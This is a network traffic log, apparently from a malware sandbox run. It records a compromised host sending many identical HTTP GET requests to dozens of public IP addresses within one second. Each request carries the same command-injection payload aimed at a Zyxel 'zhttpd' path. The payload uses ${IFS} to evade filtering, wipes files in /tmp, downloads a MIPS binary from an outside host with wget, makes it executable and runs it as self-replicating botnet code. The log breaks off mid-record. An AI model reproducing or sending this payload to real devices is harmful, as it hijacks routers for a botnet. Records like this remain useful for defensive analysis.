                                              Jan 29, 2024 07:04:08.364361048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8783192.168.2.1439408213.249.77.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364387989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8784192.168.2.1439312210.116.254.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364447117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8785192.168.2.14377521.235.77.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364476919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8786192.168.2.1451292163.19.168.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364516973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8787192.168.2.14530841.188.11.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364550114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8788192.168.2.1458248209.57.143.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364607096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8789192.168.2.1435540106.253.114.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364638090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8790192.168.2.1448956103.66.167.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364695072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8791192.168.2.145216883.97.181.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364728928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8792192.168.2.144249095.167.173.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364758015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8793192.168.2.14507165.254.111.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364794016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8794192.168.2.145669220.184.241.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364845037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8795192.168.2.145131036.211.87.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364859104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8796192.168.2.1441282168.66.134.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364898920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8797192.168.2.1449486165.180.223.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364939928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8798192.168.2.1455342113.86.230.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364973068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8799192.168.2.1459094165.11.123.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365000010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8800192.168.2.143680053.23.109.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365070105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8801192.168.2.145550853.89.27.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365087986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8802192.168.2.144230631.31.210.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365130901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8803192.168.2.1450820151.186.203.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365169048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8804192.168.2.1448498129.45.78.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365196943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8805192.168.2.14567085.80.44.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365263939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8806192.168.2.1450880135.235.191.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365299940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8807192.168.2.143506677.1.89.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365341902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8808192.168.2.1446570169.44.139.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365406990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8809192.168.2.1456454104.198.206.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365422964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8810192.168.2.144215251.156.146.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365453005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8811192.168.2.143369079.212.123.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365509987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8812192.168.2.145722641.165.42.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365541935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8813192.168.2.1440880206.112.116.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365592003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8814192.168.2.145759897.244.130.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365622044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8815192.168.2.1458520174.23.82.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365658998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8816192.168.2.1456090202.142.245.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365715027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8817192.168.2.145284089.81.117.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365725994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8818192.168.2.1439102166.117.223.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365772009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8819192.168.2.143900452.35.184.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365804911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8820192.168.2.1450046171.162.143.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365850925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8821192.168.2.144469290.14.95.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365897894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8822192.168.2.1442844202.172.117.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365926981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8823192.168.2.1458758108.194.151.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.365971088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8824192.168.2.143883452.34.198.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366003036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8825192.168.2.145944680.60.205.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366059065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8826192.168.2.1449906185.45.179.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366111994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8827192.168.2.1454058150.182.187.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366136074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8828192.168.2.146053498.84.21.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366185904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8829192.168.2.1453350159.36.226.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366236925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8830192.168.2.1448594163.56.168.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366269112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8831192.168.2.143651296.236.188.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366308928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8832192.168.2.1441346204.22.250.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366347075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8833192.168.2.1434776193.33.112.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366385937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8834192.168.2.1451452189.38.34.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366420031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8835192.168.2.144080218.192.152.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366461039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8836192.168.2.1438142204.192.161.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366508007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8837192.168.2.143897489.230.248.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366528034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8838192.168.2.1459866166.21.238.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366566896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8839192.168.2.14572449.239.6.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366616011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8840192.168.2.1433880186.16.114.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366672039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8841192.168.2.1448414133.128.69.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366691113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8842192.168.2.144223040.147.113.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366739988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8843192.168.2.144919059.188.113.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366780043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8844192.168.2.1449040205.194.242.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366820097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8845192.168.2.144028868.125.90.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366856098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8846192.168.2.1442494154.114.37.84443
                                              TimestampBytes transferredDirectionData
